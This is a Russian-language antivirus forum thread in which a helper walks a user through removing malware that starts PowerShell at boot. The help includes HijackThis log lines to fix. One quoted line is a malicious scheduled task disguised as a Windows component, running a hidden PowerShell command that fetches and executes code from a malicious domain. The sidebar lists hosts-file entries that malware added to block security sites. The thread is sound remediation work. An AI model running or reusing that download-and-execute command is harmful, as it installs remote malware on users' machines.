Перейти к содержанию
Правила раздела
Задай вопрос Алексею Тодирашу!

[РЕШЕНО] Powershell пытается запустить переход по вредоносной ссылке

grammer91

От grammer91
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

grammer91 Новичок

grammer91

Опубликовано
Опубликовано (изменено)

Добрый день!

 

Проблема в следующем: после запуска системы примерно через 30 секунд запускается и сразу закрывается Powershell, после чего антивирус публикует уведомление, что был заблокирован переход по ссылке. 

Проверку на вирусы запускал дважды, никакие угрозы найти не удалось.

Тест сообщения антивируса:

Цитата

Событие: Остановлен переход на сайт
Пользователь: NEIRODEN\progr
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: https://i.404.pm/2024/11/11/1731305914-7731.jpeg
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731305914-7731.jpeg
Путь к объекту: https://i.404.pm/2024/11/11
Причина: Облачная защита

Помогите устранить проблему, пожалуйста :)

CollectionLog-2024.11.14-11.33.zip

Изменено пользователем grammer91
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

"Пофиксите" в HijackThis только следующее (некоторые строки могут отсутствовать): 

O4 - Autorun.inf: D:\autorun.inf - (unknown target)
O22 - Tasks: SecurityHealthSystray - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm 'prolitartest.xyz/0x55/3')" (sign: 'Microsoft')
O22 - Tasks_Migrated: SecurityHealthSystray - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm 'prolitartest.xyz/0x55/3')" (sign: 'Microsoft')

 

Перезагрузите компьютер и соберите новый CollectionLog.

 

  • Like (+1) 1
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Да, вредоносная задача, которая была еще до обновления системы, удалена.

 

В завершение:

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.


 
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Исправьте по возможности:

 

Microsoft Office профессиональный плюс 2013 - ru-ru v.15.0.5467.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
FileZilla 3.67.0 v.3.67.0 Внимание! Скачать обновления
µTorrent v.3.6.0.47162 Внимание! Клиент сети P2P с рекламным модулем!.
Yandex (All Users) v.24.10.2.705 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
 

---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v.6.30 Внимание! Подозрение на демо-версию антивредоносной программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Кнопка "Яндекс" на панели задач v.2.2.0.53 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
 

Читайте Рекомендации после удаления вредоносного ПО

  • Like (+1) 1
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Ссылка на комментарий
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
 Share
Перейти к списку тем

  • Похожий контент

    • para87
      [РЕШЕНО] браузер сам пытается перейти на сайт
      От para87
      браузер Google Chrome  не всегда бывает  сам пытается перейти на сайт (byruthub.org   не надо на него переходить)  . Касперский останавливает переход на этот сайт.  
      я скачал   AV block remover (AVbr) v.4 подумал манер  тут safezone.cc запустил пишет скачайте новую версию. Его лог.  Я попробовал переименовал или  в другой место переместить  тоже самое.  Версия вроде новая.
      Malwarebytes обнаружила PUP.Optional.BundleInstaller я не чего с ними не делал лог вот 
       
      CollectionLog-2024.09.26-17.54.zip AV_block_remove_2024.09.26-18.07.log
      Malwarebytes Отчет о проверке 2024-09-26 182543.txt
    • hu553in
      [РЕШЕНО] Поймал вредоносное ПО
      От hu553in
      Проблема схожая с соседними темами.
      C:\ProgramData\Google\Chrome\updater.exe, который восстанавливается сам собой, Malwarebytes кладет его в карантин с пометкой Trojan.Crypt.Generic ежеминутные запросы от C:\Windows\System32\dialer.exe на fcm1sx3iteasdfyn2ewsd.zip, которые Malwarebytes так же блокирует в hosts все домены Windows Updates и антивирусов редиректятся на 0.0.0.0 Удаление не помогает, никакой софт для удаления (KVRT, drweb, Malwarebytes и т.п.) не помогает.
      Помогите пожалуйста.
      Прикрепляю FRST и UVS отчеты по инструкциям из соседних тем.
      DESKTOP-CIJDVRS_2024-09-22_22-35-23_v4.99.1v x64.7z Addition.txt FRST.txt
    • GraaanD
      [РЕШЕНО] PowerShell, nslookup и SettingsModifier:Win32/PossibleHostsFileHijack
      От GraaanD
      Доброе утро, день, вечер, друзья. Начал замечать что появляется и кушает оперативную память "nslookup", хотя раньше её вообще не наблюдал в диспетчере задач. В попытке её отключить замечаю что появляется PowerShell, так понимаю выполняется какая-то команда и снова включается nslookup. После этого в защитнике Windows (Знаю что не самый удачный антивирус, но все таки...) появляется SettingsModifier:Win32/PossibleHostsFileHijack. Блокируя, удаляя угрозу все начинается по новой, вижу nslookup, закрываю, powershell и по кругу. Так же проверив антивирусом Dr.Web CureIt!, что выдало мне такую ошибку, который он не может исправить 
      Может кто подсказать что это, как избавиться? А то напрягает, вирус какой схватил?
      Закрывая файл nslookup в файле hosts появляются дополнительные строки, и WD ругается, а именно строки:
      0.0.0.0       avast.com
      0.0.0.0       www.avast.com
      0.0.0.0       totalav.com
      0.0.0.0       www.totalav.com
      0.0.0.0       scanguard.com
      0.0.0.0       www.scanguard.com
      0.0.0.0       totaladblock.com
      0.0.0.0       www.totaladblock.com
      0.0.0.0       pcprotect.com
      0.0.0.0       www.pcprotect.com
      0.0.0.0       mcafee.com
      0.0.0.0       www.mcafee.com
      0.0.0.0       bitdefender.com
      0.0.0.0       www.bitdefender.com
      0.0.0.0       us.norton.com
      0.0.0.0       www.us.norton.com
      0.0.0.0       avg.com
      0.0.0.0       www.avg.com
      0.0.0.0       malwarebytes.com
      0.0.0.0       www.malwarebytes.com
      0.0.0.0       pandasecurity.com
      0.0.0.0       www.pandasecurity.com
      0.0.0.0       surfshark.com
      0.0.0.0       www.surfshark.com
      0.0.0.0       avira.com
      0.0.0.0       www.avira.com
      0.0.0.0       norton.com
      0.0.0.0       www.norton.com
      0.0.0.0       eset.com
      0.0.0.0       www.eset.com
      0.0.0.0       microsoft.com
      0.0.0.0       www.microsoft.com
      0.0.0.0       Zillya.com
      0.0.0.0       www.Zillya.com
      0.0.0.0       kaspersky.com
      0.0.0.0       www.kaspersky.com
      0.0.0.0       usa.kaspersky.com
      0.0.0.0       www.usa.kaspersky.com
      0.0.0.0       dpbolvw.net
      0.0.0.0       www.dpbolvw.net
      0.0.0.0       sophos.com
      0.0.0.0       www.sophos.com
      0.0.0.0       home.sophos.com
      0.0.0.0       www.home.sophos.com
      0.0.0.0       www.adaware.com
      0.0.0.0       adaware.com
      0.0.0.0       www.ahnlab.com
      0.0.0.0       ahnlab.com
      0.0.0.0       www.bullguard.com
      0.0.0.0       bullguard.com
      0.0.0.0       clamav.net
      0.0.0.0       www.clamav.net
      0.0.0.0       www.drweb.com
      0.0.0.0       drweb.com
      0.0.0.0       emsisoft.com
      0.0.0.0       www.emsisoft.com
      0.0.0.0       www.f-secure.com
      0.0.0.0       f-secure.com
      0.0.0.0       www.zonealarm.com
      0.0.0.0       zonealarm.com
      0.0.0.0       www.trendmicro.com
      0.0.0.0       trendmicro.com
      0.0.0.0       www.ccleaner.com
      0.0.0.0       ccleaner.com
      0.0.0.0       www.virustotal.com
      0.0.0.0       virustotal.com
    • Andrey656560
      [РЕШЕНО] Непонятное вредоносное ПО
      От Andrey656560
      Здравствуйте, столкнулся с вредоносным ПО.  Сегодня я скачал Kaspersky Premium  и начал полную проверку, и обнаружилось что-то вредоносное в Объекте: Windriver.cmd. Вредносное ПО, который обнаружил это: not-a-virus:HEUR:RiskTool.BAT.Alien.gen Путь C:\ProgramData\Microsoft. Решил я закинуть  этот объект в VirusTotal, а там уже обнаружилось 5 вредоносных ПО: 1 PowerShell/Kryptik.HJ!tr 2Trojan:BAT/Alien.RPA!MTB 3 Not-a-virus:HEUR:RiskTool.BAT.Alien.gen. Удалить не получается(не понимаю
    • Как_тус
      Попытки открыть вредоносную ссылку и скачать некое ПО от неизвестной программы.
      От Как_тус
      Здравствуйте, столкнулся с такой же проблемой, я так понимаю для каждого свой персональный код? Прикрепляю отчёт:
       
      Событие: Загрузка остановлена
      Пользователь: DESKTOP-VS9J8JP\Дети
      Тип пользователя: Активный пользователь
      Имя программы: uTorrentPro.exe
      Путь к программе: C:\Program Files\uTorrentPro
      Компонент: Веб-Антивирус
      Описание результата: Запрещено
      Тип: Возможна неправомерная загрузка ПО
      Название: http://w.apitorrent.com/ws
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
       
      Сообщение от модератора kmscom Сообщение перенесено из темы Попытки открыть вредоносную ссылку и скачать некое ПО от неизвестной программы.  
×
×
  • Создать...